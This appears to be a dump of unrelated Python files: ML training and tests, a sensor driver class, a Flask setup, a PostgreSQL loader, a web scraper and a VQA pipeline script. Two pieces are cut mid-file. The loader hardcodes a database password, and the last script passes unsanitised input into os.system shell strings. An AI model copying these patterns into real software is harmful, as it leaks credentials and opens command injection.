y_trues, y_preds = tf.split(y_true, seq_len, axis=-1), tf.split(y_pred, seq_len, axis=-1)
total_loss = 0.
for (y_true, y_pred) in zip(y_trues, y_preds):
loss = K.categorical_crossentropy(y_true, K.softmax(y_pred, axis=-1))
loss = K.mean(loss)
total_loss += loss
return total_loss / seq_len
if __name__ == '__main__':
train_batch_size = 16
val_batch_size = 100
num_classes = 26
image_size = (53, 129, 3)
(X_train, Y_train), (X_val, Y_val) = get_dataset()
train_dataset = Dataset(X_train, Y_train, image_transform=ImageTf(image_size[:2]),
label_transform=ToOneHot(num_classes))
val_dataset = Dataset(X_val, Y_val, image_transform=ImageTf(image_size[:2]), label_transform=ToOneHot(num_classes))
train_generator = generator(train_dataset, batch_size=train_batch_size, shuffle=True)
val_generator = generator(val_dataset, batch_size=val_batch_size, shuffle=False)
image_input = Input(shape=image_size, name='image_input', dtype='float32')
y_true = Input(shape=(num_classes * seq_len, ), dtype='int32')
out = OCR_Model(image_input, num_classes, seq_len=seq_len)
out = CrossEntropy(-1)([y_true, out])
model = Model([y_true, image_input], out)
model.compile(Adam())
num_val_examples = len(Y_val)
num_val_batches = math.ceil(num_val_examples / val_batch_size)
def evaluate(model, seq_len=seq_len):
total_loss = 0.
total_corrects = 0
for _ in range(num_val_batches):
batch_data, _ = next(val_generator)
val_loss, predict = model.test_on_batch(batch_data, y=None), model.predict_on_batch(batch_data)
total_loss += val_loss
y_trues = np.split(batch_data[0], seq_len, axis=-1)
y_preds = np.split(predict, seq_len, axis=-1)
tmp = 1
for (y_true, y_pred) in zip(y_trues, y_preds):
tmp *= (np.argmax(y_true, axis=-1) == np.argmax(y_pred, axis=-1))
total_corrects += np.sum(tmp)
val_loss = total_loss / num_val_batches
val_acc = (total_corrects / num_val_examples) * 100
return val_loss, val_acc
class Evaluator(Callback):
def __init__(self):
super(Evaluator, self).__init__()
def on_epoch_end(self, epoch, logs=None):
val_loss, val_acc = evaluate(self.model)
print(f'val_loss = {val_loss:.5f}, top-1 val_acc = {val_acc:.2f}.')
evaluator = Evaluator()
model.fit_generator(
train_generator,
steps_per_epoch=math.ceil(len(Y_train) / train_batch_size),
epochs=10,
callbacks=[evaluator],
shuffle=False,
initial_epoch=0
) |
""" Callables
What are callables?
Any obje
""" |
# -*- coding: utf-8 -*-
# (c) Copyright 2020 Sensirion AG, Switzerland
##############################################################################
##############################################################################
# _____ _ _ _______ _____ ____ _ _
# / ____| /\ | | | |__ __|_ _/ __ \| \ | |
# | | / \ | | | | | | | || | | | \| |
# | | / /\ \| | | | | | | || | | | . ` |
# | |____ / ____ \ |__| | | | _| || |__| | |\ |
# \_____/_/ \_\____/ |_| |_____\____/|_| \_|
#
# THIS FILE IS AUTOMATICALLY GENERATED AND MUST NOT BE EDITED MANUALLY!
#
# Generator: sensirion-shdlc-interface-generator 0.5.1
# Product: Sensor Bridge
# Version: 0.1.0
#
##############################################################################
##############################################################################
# flake8: noqa
from __future__ import absolute_import, division, print_function
from sensirion_shdlc_driver.command import ShdlcCommand
from struct import pack, unpack
import logging
log = logging.getLogger(__name__)
class SensorBridgeCmdPortVoltageOnOffBase(ShdlcCommand):
"""
SHDLC command 0x01: "Port Voltage On Off".
"""
def __init__(self, *args, **kwargs):
super(SensorBridgeCmdPortVoltageOnOffBase, self).__init__(
0x01, *args, **kwargs)
class SensorBridgeCmdPortVoltageOnOff(SensorBridgeCmdPortVoltageOnOffBase):
def __init__(self, port, state):
"""
Port Voltage On Off Command
Switches a port supply on or off. If switched on, the previously set
voltage will be applied.
:param int port:
The port(s) to switch on or off:
- 0x00: Port 1
- 0x01: Port 2
- 0xFF: All ports
:param int state:
The new state to set:
- 0x00: off
- 0x01: on
"""
super(SensorBridgeCmdPortVoltageOnOff, self).__init__(
data=b"".join([pack(">B", port),
pack(">B", state)]),
max_response_time=0.05,
post_processing_time=0.0,
min_response_length=0,
max_response_length=0
)
|
import logging.config
import logging.handlers
import os
from pathlib import Path
def get_logs_directory():
return Path(os.path.split(__file__)[0] + '/logs')
def configure_logging():
logs_directory = get_logs_directory()
if not logs_directory.exists():
logs_directory.mkdir()
logging.config.dictConfig({
'version': 1,
'formatters': {
'generic': {
'format': '[%(asctime)s][%(levelname)s][%(module)s]: %(message)s'
},
'plain': {
'format': '%(message)s'
},
},
'handlers': {
'errstream': {
'class': 'logging.StreamHandler',
'formatter': 'generic',
'level': 'INFO',
'stream': 'ext://sys.stderr'
},
'stdout': {
'class': 'logging.StreamHandler',
'formatter': 'plain',
'level': 'INFO',
'stream': 'ext://sys.stdout'
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'generic',
'level': 'INFO',
'filename': f'{logs_directory}/tradernet_cli.log',
'maxBytes': 8192,
'backupCount': 5,
},
},
'loggers': {
'root': {
'handlers': ['errstream', 'file'],
'level': 'INFO',
},
'console': {
'handlers': ['stdout'],
'level': 'INFO',
},
},
'disable_existing_loggers': False,
})
|
"""
Defines TestUGrid
"""
from __future__ import print_function
import os
import unittest
import numpy as np
import pyNastran
from pyNastran.bdf.bdf import read_bdf
from pyNastran.converters.nastran.nastran_to_ugrid import nastran_to_ugrid
from pyNastran.converters.nastran.nastran_to_ugrid3d import merge_ugrid3d_and_bdf_to_ugrid3d_filename
from pyNastran.converters.aflr.ugrid.ugrid3d_to_nastran import ugrid3d_to_nastran
from pyNastran.converters.aflr.ugrid.ugrid3d_to_tecplot import (
ugrid_to_tecplot, ugrid3d_to_tecplot_filename, read_ugrid)
from pyNastran.utils.log import get_logger
PKG_PATH = pyNastran.__path__[0]
UGRID_PATH = os.path.join(PKG_PATH, 'converters', 'aflr', 'ugrid', 'models')
TECPLOT_PATH = os.path.join(PKG_PATH, 'converters', 'tecplot', 'models')
NASTRAN_PATH = os.path.join(PKG_PATH, '..', 'models')
class TestUgrid(unittest.TestCase):
"""runs ugrid2d/3d tests"""
def test_ugrid_01(self):
"""tests solid_bending.bdf"""
nastran_filename1 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.bdf')
ugrid_filename = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.b8.ugrid')
log = get_logger(level='warning')
unused_ugrid_model = nastran_to_ugrid(
nastran_filename1, ugrid_filename_out=ugrid_filename,
properties=None, check_shells=False, check_solids=True, log=log)
assert os.path.exists(ugrid_filename), ugrid_filename
nastran_filename2 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending2.bdf')
ugrid_model = ugrid3d_to_nastran(
ugrid_filename, nastran_filename2,
include_shells=True, include_solids=True,
convert_pyram_to_penta=False,
encoding=None, size=16,
is_double=False, log=log)
nastran_filename3 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending3.bdf')
tris, quads = ugrid_model.skin_solids()
ugrid_model.tris = tris
ugrid_model.quads = quads
ugrid_model.pids = np.ones(len(tris) + len(quads))
ugrid_model.write_bdf(nastran_filename3)
bdf_model = read_bdf(nastran_filename3)
#print(bdf_model.get_bdf_stats())
assert os.path.exists(nastran_filename3), nastran_filename3
#tecplot_filename1 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.plt')
#ugrid3d_to_tecplot_filename(model, tecplot_filename1)
#assert os.path.exists(tecplot_filename1), tecplot_filename1
tecplot_filename2 = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending2.plt')
tecplot = ugrid_to_tecplot(ugrid_model)
tecplot.write_tecplot(tecplot_filename2, res_types=None,
is_points=True,
adjust_nids=True)
assert os.path.exists(tecplot_filename2), tecplot_filename2
ugrid_filename_out = os.path.join(NASTRAN_PATH, 'solid_bending', 'solid_bending.b8.ugrid_out')
pshell_pids_to_remove = []
merge_ugrid3d_and_bdf_to_ugrid3d_filename(
ugrid_filename, nastran_filename3, ugrid_filename_out,
pshell_pids_to_remove,
update_equivalence=True, tol=0.01)
assert os.path.exists(ugrid_filename_out), ugrid_filename_out
def test_ugrid3d_gui_box(self):
"""simple UGRID3D box model"""
ugrid_filename = os.path.join(UGRID_PATH, 'box.b8.ugrid')
log = get_logger(level='warning')
tecplot_filename2 = os.path.join(UGRID_PATH, 'box.plt')
ugrid_model = read_ugrid(ugrid_filename, log=log)
tecplot = ugrid3d_to_tecplot_filename(ugrid_filename, tecplot_filename2)
tecplot = ugrid_to_tecplot(ugrid_filename)
tecplot = ugrid_to_tecplot(ugrid_model)
tecplot.write_tecplot(tecplot_filename2, res_types=None,
is_points=True,
adjust_nids=True)
assert os.path.exists(tecplot_filename2), tecplot_filename2
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
import sys
def get_logger_traceback(): # noqa
"""
Returns a traceback object for a log event.
A traceback object is only available when an exception has been thrown. To get one for a log event
we throw an exception and then wrap it in our own Traceback proxy that hides parts of the stack trace
lower than the logging call.
"""
try:
raise ZeroDivisionError
except ZeroDivisionError:
return TracebackFrameProxy(sys.exc_info()[2])
class TracebackFrameProxy:
"""Proxies a traceback frame to hide parts of the trace related to logging.."""
def __init__(self, tb, frames_level=0):
self.tb = tb
self.frames_level = frames_level
self.frames_from_top = self.organize_tb_frames()
@property
def tb_frame(self):
return self.frames_from_top[self.frames_level]
@property
def tb_lineno(self):
return self.tb_frame.f_lineno
@property
def tb_lasti(self):
return self.tb_frame.f_lasti
@property
def tb_next(self):
if self.frames_level < len(self.frames_from_top) - 1:
return TracebackFrameProxy(self.tb, frames_level=self.frames_level + 1)
return None
def organize_tb_frames(self):
f = self.tb.tb_frame
first_f = f
found_log_call = False
while f:
if f.f_code.co_name == "_log" and "logging" in f.f_code.co_filename:
if "makeRecord" in f.f_code.co_names:
f = f.f_back.f_back
found_log_call = True
break
f = f.f_back
# return entire stack if it can't find the right place to censor
if not found_log_call:
f = first_f
frames = []
while f:
frames.append(f)
f = f.f_back
frames.reverse()
return frames
def __getattr__(self, name):
return getattr(self.tb, name)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for transform ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import gradient_checker
from tensorflow_addons.image import transform_ops
from tensorflow_addons.utils import test_utils
_DTYPES = set([
tf.dtypes.uint8, tf.dtypes.int32, tf.dtypes.int64, tf.dtypes.float16,
tf.dtypes.float32, tf.dtypes.float64
])
class ImageOpsTest(tf.test.TestCase):
@test_utils.run_in_graph_and_eager_modes
def test_compose(self):
for dtype in _DTYPES:
image = tf.constant(
[[1, 1, 1, 0], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 0]],
dtype=dtype)
# Rotate counter-clockwise by pi / 2.
rotation = transform_ops.angles_to_projective_transforms(
np.pi / 2, 4, 4)
# Translate right by 1 (the transformation matrix is always inverted,
# hence the -1).
translation = tf.constant([1, 0, -1, 0, 1, 0, 0, 0],
dtype=tf.dtypes.float32)
composed = transform_ops.compose_transforms(rotation, translation)
image_transformed = transform_ops.transform(image, composed)
self.assertAllEqual(
[[0, 0, 0, 0], [0, 1, 0, 1], [0, 1, 0, 1], [0, 1, 1, 1]],
image_transformed)
@test_utils.run_in_graph_and_eager_modes
def test_extreme_projective_transform(self):
for dtype in _DTYPES:
image = tf.constant(
[[1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1]],
dtype=dtype)
transformation = tf.constant([1, 0, 0, 0, 1, 0, -1, 0],
tf.dtypes.float32)
image_transformed = transform_ops.transform(image, transformation)
self.assertAllEqual(
[[1, 0, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]],
image_transformed)
def test_transform_static_output_shape(self):
image = tf.constant([[1., 2.], [3., 4.]])
result = transform_ops.transform(
image,
tf.random.uniform([8], -1, 1),
output_shape=tf.constant([3, 5]))
self.assertAllEqual([3, 5], result.shape)
def _test_grad(self, shape_to_test):
with self.cached_session():
test_image_shape = shape_to_test
test_image = np.random.randn(*test_image_shape)
test_image_tensor = tf.constant(test_image, shape=test_image_shape)
test_transform = transform_ops.angles_to_projective_transforms(
np.pi / 2, 4, 4)
output_shape = test_image_shape
output = transform_ops.transform(test_image_tensor, test_transform)
left_err = gradient_checker.compute_gradient_error(
test_image_tensor,
test_image_shape,
output,
output_shape,
x_init_value=test_image)
self.assertLess(left_err, 1e-10)
def _test_grad_different_shape(self, input_shape, output_shape):
with self.cached_session():
test_image_shape = input_shape
test_image = np.random.randn(*test_image_shape)
test_image_tensor = tf.constant(test_image, shape=test_image_shape)
test_transform = transform_ops.angles_to_projective_transforms(
np.pi / 2, 4, 4)
if len(output_shape) == 2:
resize_shape = output_shape
elif len(output_shape) == 3:
resize_shape = output_shape[0:2]
elif len(output_shape) == 4:
resize_shape = output_shape[1:3]
output = transform_ops.transform(
images=test_image_tensor,
transforms=test_transform,
output_shape=resize_shape)
left_err = gradient_checker.compute_gradient_error(
test_image_tensor,
test_image_shape,
output,
output_shape,
x_init_value=test_image)
self.assertLess(left_err, 1e-10)
# TODO: switch to TF2 later.
@test_utils.run_deprecated_v1
def test_grad(self):
self._test_grad([16, 16])
self._test_grad([4, 12, 12])
self._test_grad([3, 4, 12, 12])
self._test_grad_different_shape([16, 16], [8, 8])
self._test_grad_different_shape([4, 12, 3], [8, 24, 3])
self._test_grad_different_shape([3, 4, 12, 3], [3, 8, 24, 3])
@test_utils.run_in_graph_and_eager_modes
def test_transform_data_types(self):
for dtype in _DTYPES:
image = tf.constant([[1, 2], [3, 4]], dtype=dtype)
self.assertAllEqual(
np.array([[4, 4], [4, 4]]).astype(dtype.as_numpy_dtype()),
transform_ops.transform(image, [1] * 8))
@test_utils.run_in_graph_and_eager_modes
def test_transform_eager(self):
image = tf.constant([[1., 2.], [3., 4.]])
self.assertAllEqual(
np.array([[4, 4], [4, 4]]), transform_ops.transform(
image, [1] * 8))
@test_utils.run_all_in_graph_and_eager_modes
class RotateOpTest(tf.test.TestCase):
def test_zeros(self):
for dtype in _DTYPES:
for shape in [(5, 5), (24, 24), (2, 24, 24, 3)]:
for angle in [0, 1, np.pi / 2.0]:
image = tf.zeros(shape, dtype)
self.assertAllEqual(
transform_ops.rotate(image, angle),
np.zeros(shape, dtype.as_numpy_dtype()))
def test_rotate_even(self):
for dtype in _DTYPES:
image = tf.reshape(tf.cast(tf.range(36), dtype), (6, 6))
image_rep = tf.tile(image[None, :, :, None], [3, 1, 1, 1])
angles = tf.constant([0.0, np.pi / 4.0, np.pi / 2.0], tf.float32)
image_rotated = transform_ops.rotate(image_rep, angles)
# yapf: disable
self.assertAllEqual(
image_rotated[:, :, :, 0],
[[[0, 1, 2, 3, 4, 5],
[6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23],
[24, 25, 26, 27, 28, 29],
[30, 31, 32, 33, 34, 35]],
[[0, 3, 4, 11, 17, 0],
[2, 3, 9, 16, 23, 23],
[1, 8, 15, 21, 22, 29],
[6, 13, 20, 21, 27, 34],
[12, 18, 19, 26, 33, 33],
[0, 18, 24, 31, 32, 0]],
[[5, 11, 17, 23, 29, 35],
[4, 10, 16, 22, 28, 34],
[3, 9, 15, 21, 27, 33],
[2, 8, 14, 20, 26, 32],
[1, 7, 13, 19, 25, 31],
[0, 6, 12, 18, 24, 30]]])
# yapf: enable
def test_rotate_odd(self):
for dtype in _DTYPES:
image = tf.reshape(tf.cast(tf.range(25), dtype), (5, 5))
image_rep = tf.tile(image[None, :, :, None], [3, 1, 1, 1])
angles = tf.constant([np.pi / 4.0, 1.0, -np.pi / 2.0], tf.float32)
image_rotated = transform_ops.rotate(image_rep, angles)
# yapf: disable
self.assertAllEqual(
image_rotated[:, :, :, 0],
[[[0, 3, 8, 9, 0],
[1, 7, 8, 13, 19],
[6, 6, 12, 18, 18],
[5, 11, 16, 17, 23],
[0, 15, 16, 21, 0]],
[[0, 3, 9, 14, 0],
[2, 7, 8, 13, 19],
[1, 6, 12, 18, 23],
[5, 11, 16, 17, 22],
[0, 10, 15, 21, 0]],
[[20, 15, 10, 5, 0],
[21, 16, 11, 6, 1],
[22, 17, 12, 7, 2],
[23, 18, 13, 8, 3],
[24, 19, 14, 9, 4]]])
# yapf: enable
def test_compose_rotate(self):
for dtype in _DTYPES:
image = tf.constant(
[[1, 1, 1, 0], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 0]],
dtype=dtype)
# Rotate counter-clockwise by pi / 2.
rotation = transform_ops.angles_to_projective_transforms(
np.pi / 2, 4, 4)
# Translate right by 1 (the transformation matrix is always inverted,
# hence the -1).
translation = tf.constant([1, 0, -1, 0, 1, 0, 0, 0],
dtype=tf.float32)
composed = transform_ops.compose_transforms(rotation, translation)
image_transformed = transform_ops.transform(image, composed)
self.assertAllEqual(
image_transformed,
[[0, 0, 0, 0], [0, 1, 0, 1], [0, 1, 0, 1], [0, 1, 1, 1]])
def test_bilinear(self):
image = tf.constant(
# yapf: disable
[[0, 0, 0, 0, 0], [0, 1, 1, 1, 0], [0, 1, 0, 1, 0],
[0, 1, 1, 1, 0], [0, 0, 0, 0, 0]],
# yapf: enable
tf.float32)
# The following result matches:
# >>> scipy.ndimage.rotate(image, 45, order=1, reshape=False)
# which uses spline interpolation of order 1, equivalent to bilinear
# interpolation.
self.assertAllClose(
transform_ops.rotate(image, np.pi / 4.0, interpolation="BILINEAR"),
# yapf: disable
[[0.000, 0.000, 0.343, 0.000, 0.000],
[0.000, 0.586, 0.914, 0.586, 0.000],
[0.343, 0.914, 0.000, 0.914, 0.343],
[0.000, 0.586, 0.914, 0.586, 0.000],
[0.000, 0.000, 0.343, 0.000, 0.000]],
# yapf: enable
atol=0.001)
# yapf: disable
self.assertAllClose(
transform_ops.rotate(
image, np.pi / 4.0, interpolation="NEAREST"),
[[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 0, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0]])
# yapf: enable
def test_bilinear_uint8(self):
# yapf: disable
image = tf.constant(
np.asarray(
[[0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 255, 255, 255, 0.0],
[0.0, 255, 0.0, 255, 0.0],
[0.0, 255, 255, 255, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0]],
np.uint8),
tf.uint8)
# yapf: enable
# == np.rint((expected image above) * 255)
# yapf: disable
self.assertAllEqual(
transform_ops.rotate(image, np.pi / 4.0, interpolation="BILINEAR"),
[[0.0, 0.0, 87., 0.0, 0.0], [0.0, 149, 233, 149, 0.0],
[87., 233, 0.0, 233, 87.], [0.0, 149, 233, 149, 0.0],
[0.0, 0.0, 87., 0.0, 0.0]])
# yapf: enable
def test_rotate_static_shape(self):
image = tf.linalg.diag([1., 2., 3.])
result = transform_ops.rotate(
image, tf.random.uniform((), -1, 1), interpolation="BILINEAR")
self.assertEqual(image.get_shape(), result.get_shape())
if __name__ == "__main__":
tf.test.main()
|
import time
import numpy as np
from ezmodel.core.transformation import NoNormalization
from ezmodel.util.misc import is_duplicate, at_least2d
class Model:
def __init__(self,
norm_X=NoNormalization(),
norm_y=NoNormalization(),
active_dims=None,
filter_nan_and_inf=True,
eliminate_duplicates=False,
eliminate_duplicates_eps=1e-16,
raise_exception_while_fitting=True,
raise_exception_while_prediction=True,
verbose=False,
**kwargs):
self.norm_X = norm_X
self.norm_y = norm_y
self.eliminate_duplicates = eliminate_duplicates
self.eliminate_duplicates_eps = eliminate_duplicates_eps
self.active_dims = active_dims
self.filter_nan_and_inf = filter_nan_and_inf
self.verbose = verbose
self.time = None
self.model = None
self.X, self.y = None, None
self._X, self._y = None, None
self.success = None
self.data = {}
self.raise_exception_while_fitting = raise_exception_while_fitting
self.raise_exception_while_prediction = raise_exception_while_prediction
self.exception = None
self.has_been_fitted = False
def preprocess(self, X, y, **kwargs):
if self.active_dims is not None:
X = X[:, self.active_dims]
if self.eliminate_duplicates:
I = ~is_duplicate(X, eps=self.eliminate_duplicates_eps)
X, y = X[I], y[I]
if self.filter_nan_and_inf:
X_I = np.all(~np.isnan(X) & ~np.isinf(X), axis=1)
y_I = np.all(~np.isnan(y) & ~np.isinf(y), axis=1)
X, y = X[X_I & y_I], y[X_I & y_I]
X, y = self.norm_X.forward(X), self.norm_y.forward(y)
X, y = self._preprocess(X, y, **kwargs)
return X, y
def postprocess(self, out, **kwargs):
if "y" in out:
out["y"] = self.norm_y.backward(out["y"])
out = self._postprocess(out, **kwargs)
return out
def fit(self, X, y, **kwargs):
X, y = at_least2d(X, expand="r"), at_least2d(y, expand="c")
assert len(X) == len(y)
self._X, self._y = X, y
self.X, self.y = self.preprocess(X, y)
start = time.time()
try:
# fit the model given the data
self._fit(self.X, self.y, **kwargs)
# do some parameter optimization if the model requires it
self._optimize(**kwargs)
# if no exception occurs set the model to be fitted successfully
self.success = True
except Exception as ex:
self.success = False
self.exception = ex
if self.raise_exception_while_fitting:
raise ex
self.has_been_fitted = True
self.time = time.time() - start
return self
def predict(self, X,
return_values_of=["y"],
return_as_dictionary=False,
**kwargs):
if not self.success:
if self.raise_exception_while_fitting:
raise Exception("There was an error while fitting the model.")
else:
return np.full(len(X), np.nan)
if self.active_dims is not None:
X = X[:, self.active_dims]
# normalize the input
X = self.norm_X.forward(at_least2d(X, expand="r"))
# write in the output dictionary what should be returned
out = {}
for k in return_values_of:
out[k] = None
try:
# get the prediction from the actual implementation
self._predict(X, out, **kwargs)
# do the post processing of the outputs
out = self.postprocess(out, **kwargs)
except Exception as e:
if self.raise_exception_while_prediction:
raise e
else:
out["y"] = np.full(len(X), np.inf)
if return_as_dictionary:
return out
else:
ret = tuple([out[v] for v in return_values_of])
return ret if len(ret) > 1 else ret[0]
@classmethod
def hyperparameters(cls):
return {}
def _preprocess(self, X, y, **kwargs):
return X, y
def _postprocess(self, out, **kwargs):
return out
def _fit(self, X, y, **kwargs):
pass
def _predict(self, X, out, **kwargs):
pass
def _optimize(self, **kwargs):
pass
|
# -*- coding: utf-8 -*-
# A Survey on Negative Transfer
# https://github.com/chamwen/NT-Benchmark
import os.path as osp
from datetime import datetime
from datetime import timedelta, timezone
from utils.utils import create_folder
class LogRecord:
def __init__(self, args):
self.args = args
self.result_dir = args.result_dir
self.data_env = 'gpu'
self.data_name = args.dset
self.method = args.method
def log_init(self):
create_folder(self.result_dir, self.args.data_env, self.args.local_dir)
if self.data_env == 'local':
time_str = datetime.utcnow().replace(tzinfo=timezone.utc).astimezone(
timezone(timedelta(hours=8), name='Asia/Shanghai')).strftime("%Y-%m-%d_%H_%M_%S")
if self.data_env == 'gpu':
time_str = datetime.utcnow().replace(tzinfo=timezone.utc).strftime("%Y-%m-%d_%H_%M_%S")
file_name_head = 'log_' + self.method + '_' + self.data_name + '_'
self.args.out_file = open(osp.join(self.args.result_dir, file_name_head + time_str + '.txt'), 'w')
self.args.out_file.write(self._print_args() + '\n')
self.args.out_file.flush()
return self.args
def record(self, log_str):
self.args.out_file.write(log_str + '\n')
self.args.out_file.flush()
return self.args
def _print_args(self):
s = "==========================================\n"
for arg, content in self.args.__dict__.items():
s += "{}:{}\n".format(arg, content)
return s
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from config import config
# from vision import BoF
import for_html
# bof = BoF()
# instantiate for_html
for_html_real = for_html.for_html()
csrf = CSRFProtect()
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
for_html_real.init_app(app)
csrf.init_app(app)
# 注册蓝本
from .main import main
app.register_blueprint(main)
return app
|
import psycopg2.extras
import time
import csvMaker
connection = psycopg2.connect(
host="localhost",
port="5432",
database="project1",
user="dgy",
password='xtny38206',
)
connection.autocommit = True
cursor = connection.cursor()
def pre_process(file_name):
start_time = time.time()
supply_center,client_enterprise, salesman, \
product, product_model, contract, contract_content=\
csvMaker.make_contract_csv(file_name)
print("pre_process time is %s seconds ---" % (time.time() - start_time))
time1 = time.time()
start_time = time.time()
cursor.execute("""alter table supply_center disable trigger ALL;""")
cursor.copy_from(supply_center, 'supply_center', sep='|')
print("director time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table client_enterprise disable trigger ALL;""")
cursor.copy_from(client_enterprise, 'client_enterprise', sep='|')
print("client_enterprise time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table salesman disable trigger ALL;""")
cursor.copy_from(salesman, 'salesman', sep='|')
print("salesman time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table product disable trigger ALL;""")
cursor.copy_from(product, 'product', sep='|')
print("product time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table product_model disable trigger ALL;""")
cursor.copy_from(product_model, 'product_model', sep='|')
print("product_model time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table contract disable trigger ALL;""")
cursor.copy_from(contract, 'contract', sep='|')
print("contract time is %s seconds ---" % (time.time() - start_time))
start_time = time.time()
cursor.execute("""alter table contract_content disable trigger ALL;""")
cursor.copy_from(contract_content, 'contract_content', sep='|')
print("contract_content time is %s seconds ---" % (time.time() - start_time))
print("total import time is %s seconds ---" % (time.time() - time1))
def copy_from_test(file_name, table_name):
with open(file_name, 'r') as f:
f.readline()
cursor.copy_from(f, table_name, sep=',')
connection.commit()
start = time.time()
# pre_process('data.csv')
pre_process('contract_info.csv')
end = time.time()
print('total time:'+str(end - start))
|
import itertools
import collections
import time
# Check to see if d1 matches d2 or any circular rotation of d2
def foo(d1,d2):
for i in range(len(d1)):
if d1==d2:
return(True)
d2.reverse()
if d1==d2:
return(True)
d2.reverse()
d2.rotate()
return(False)
# Check to see if vector x (or a rotation) is already in list c
def new_row(c,x):
for i in c:
if foo(i,x):
return(False)
return(True)
# Create a list of all possible n-tuples and only store the
# ones that have the correct number of digits
t1=time.time()
b=[]
for i in itertools.product([1,2,3,4,5],repeat=10):
if i.count(1)==2 and i.count(2)==2 and i.count(3)==2 and i.count(4)==2:
b.append(i)
t2=time.time()
print("Number of candidate solutions = ",len(b))
print("Setup time (secs) = ",t2-t1)
# Convert to deque for rapid comparisons
b=[collections.deque(i) for i in b]
c=[]
t1=time.time()
for n,i in enumerate(b):
if n%1000 == 0:
print("Progress = ",n," Solutions = ",len(c))
if new_row(c,i):
c.append(i)
t2=time.time()
print("Number of solutions = ",len(c))
print("Solution time (secs) = ",t2-t1)
|
import csv
import requests
from bs4 import BeautifulSoup
import re
def get_html(url):
r = requests.get(url)
return r.text
def write_csv(data):
with open('cmc.csv', 'a') as f:
writer = csv.writer(f)
writer.writerow((
data['name'],
data['url'],
data['price'],
))
def get_page_data(html):
soup = BeautifulSoup(html, 'lxml')
trs = soup.find_all('tr', class_='cmc-table-row')
for tr in trs:
name = tr.find('div', class_='cmc-table__column-name').find('a').text
url = 'https://coinmarketcap.com' + tr.find('div', class_='cmc-table__column-name').find('a').get('href')
price = tr.find('td', class_='cmc-table__cell--sort-by__price').find('a').text.replace('$', '').replace(',','')
data = {
'name': name,
'url': url,
'price': price
}
write_csv(data)
try:
next100 = soup.find('div', class_='cmc-table-listing__pagination').find('a', text=re.compile('Next')).get('href')
except:
print('Finish')
return False
return next100.strip('/')
def main():
url = 'https://coinmarketcap.com/'
next100 = '1'
while next100: # перебор с помощью регулярных выражений
next100 = get_page_data(get_html(url+next100))
print(next100)
# for i in range(27): # перебор по количеству страниц
# get_page_data(get_html(url+str(i)))
if __name__ == '__main__':
main()
|
import subprocess
import os
import sys
import os
import argparse
print "Downloading our Model"
os.system("cd model ; wget https://www.dropbox.com/s/szpt9smob7mk8s4/model_id.t7?dl=0")
parser = argparse.ArgumentParser()
parser.add_argument("-imf", "--image_folder", help="Folder containing the images")
parser.add_argument("-beam", "--beam_size", help="Beam search size for sampling questions from RNN/LSTM")
args = parser.parse_args()
image_folder = "../images/" if args.image_folder is None else args.image_folder
beam_size = 10 if args.beam_size is None else args.beam_size
#print image_folder
#print beam_size
os.system("cd questions ; rm questions.txt")
os.system("cd images ; rm images.txt")
os.system("cd neuraltalk2 ; th eval.lua -model ../model/model_id.t7 -image_folder " + image_folder +" -sample_max 1 -beam_size "+ str(beam_size))
filenames = []
app_path = image_folder
with open("./images/images.txt","r") as read:
line = read.readlines()
filenames = line
filenames = [x.split("\n")[0].split("/")[-1] for x in filenames]
#print filenames
with open("./questions/questions.txt", 'r') as f:
questions = f.readlines()
questions = [x.split('/n')[0] for x in questions]
quest_file = {}
for i in range(0,len(filenames)):
quest_file[filenames[i]] = questions[i*5: i*5+5]
for key in quest_file:
file_name_str = "../answers/"+key.split(".jpg")[0]+".txt"
if True: # not os.path.isfile("./"+file_name_str):
# with open(file_name_str, 'w') as outfile:
for i in range(0,5):
#print "i : ", i
#os.system("cd ./VQA_Demo;")
arg2 = key
arg4 = quest_file[key][i]
#print arg2, " ", arg4
os.system("pwd ;")
#proc = subprocess.Popen(['python', './VQA_Demo/demo.py', '-image_file_name ./images/snow_man -question "here is man"'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
#print proc.communicate()[0]
#thread.spleep(100)
#print "answer"
os.system('cd VQA_Demo ; python demo.py -image_file_name '+app_path + arg2+' -question "'+arg4+'" >> '+file_name_str)
#print 'cd VQA_Demo ; python demo.py -image_file_name '+app_path + arg2+' -question "'+arg4+'" >> '+file_name_str
#sys.stdout = open(outfile, 'w')
